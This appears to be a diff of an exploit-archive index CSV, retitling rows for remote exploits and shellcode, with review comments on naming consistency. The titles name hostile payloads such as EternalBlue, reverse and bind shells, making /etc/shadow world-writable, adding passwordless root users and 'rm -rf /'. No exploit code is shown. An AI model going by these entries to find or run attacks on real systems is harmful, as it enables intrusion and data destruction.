26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0
25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0
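Review bot: the author field of the unchanged context row 26288 ("eter Zelezny") appears to be missing its first letter; since the surrounding rows are being touched for title cleanup, it is worth correcting the truncated name in the same pass rather than leaving a known-bad field in the CSV.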
@ -15392,8 +15393,8 @@ id,file,description,date,author,platform,type,port
38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020
38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080 38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080
39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0
39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0
39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0
@ -15620,7 +15621,7 @@ id,file,description,date,author,platform,type,port
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
@ -15656,7 +15657,7 @@ id,file,description,date,author,platform,type,port
41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0
42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0 42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0
42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
42022,platforms/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,windows,remote,0 42022,platforms/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,windows,remote,0
42023,platforms/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,windows,remote,23423 42023,platforms/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,windows,remote,23423
42024,platforms/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,php,remote,0 42024,platforms/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,php,remote,0
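Review bot: the rewritten title for 42030 keeps the duplicated product name "Microsoft Windows Windows 8/8.1/2012 R2 (x64)"; while adding 8.1 to the version list, drop the repeated "Windows" so the title reads "Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)".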
@ -15689,8 +15690,8 @@ id,file,description,date,author,platform,type,port
42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
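Review bot: the hunk counts (8 lines before, 8 after) show that row 42306 ("NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection") is removed where the new row 42315 is inserted; the commit summary only announces new exploits, so confirm that 42306 is re-added elsewhere in the file or state in the commit message that it is intentionally dropped. The new 42315 title also repeats the product name ("Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2"), the same defect present in 42030, and the "2016 R2" token should be checked against the exploit's own header before it lands.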
@ -15736,14 +15737,14 @@ id,file,description,date,author,platform,type,port
13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0
13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0 13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0
13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
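Review bot: the 13296 rename in this hunk introduces the spelling "IPTables", but the tool's own name is lowercase "iptables", and the same column elsewhere uses "Iptables" (13317) and "/sbin/iptables" (14305). Pick one spelling for the description column, preferably "iptables" as the project writes it, so that text searches over files.csv match all three entries.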
@ -15754,7 +15755,7 @@ id,file,description,date,author,platform,type,port
13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
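Review bot: while 13307 is being retitled "Self-Modifying Anti-IDS", the neighbouring context line 13308 still reads "Forks a HTTP Server on 8800/TCP"; since this pass is normalizing descriptions, "Forks an HTTP Server on 8800/TCP" belongs in the same hunk.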
@ -15765,13 +15766,13 @@ id,file,description,date,author,platform,type,port
13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0
13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0
13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0
13320,platforms/lin_x86-64/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode,0 13320,platforms/lin_x86-64/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode,0
13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0
13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl script execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - file reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0
13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0
13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
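Review bot: Title Case is applied selectively in this hunk: 13322, 13323 and 13324 become "File Unlinker", "Perl Script Execution" and "File Reader", while 13321 ("Serial port shell binding + busybox Launching") keeps its mixed case on the line directly above. If the intent is a normalized description column, the context lines in the same hunk should be treated the same way, or the capitalization pass should be left for one consistent sweep.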
@ -15796,7 +15797,7 @@ id,file,description,date,author,platform,type,port
13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0
13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
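Review bot: the 13349 rename drops "Without Password", which is the one detail that distinguishes this entry from the other add-user shellcodes in the file (13385, 13428, 13450, 13451, 13461) and is exactly what someone triaging a sample wants to know about the /etc/passwd line it writes. The same detail is removed from 13385 and 18294 in later hunks. Suggest keeping it, e.g. "Add Root User (r00t) Without Password To /etc/passwd Shellcode (69 bytes)".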
@ -15829,14 +15830,14 @@ id,file,description,date,author,platform,type,port
13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0
13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0
13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0
13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0
13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0
13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0
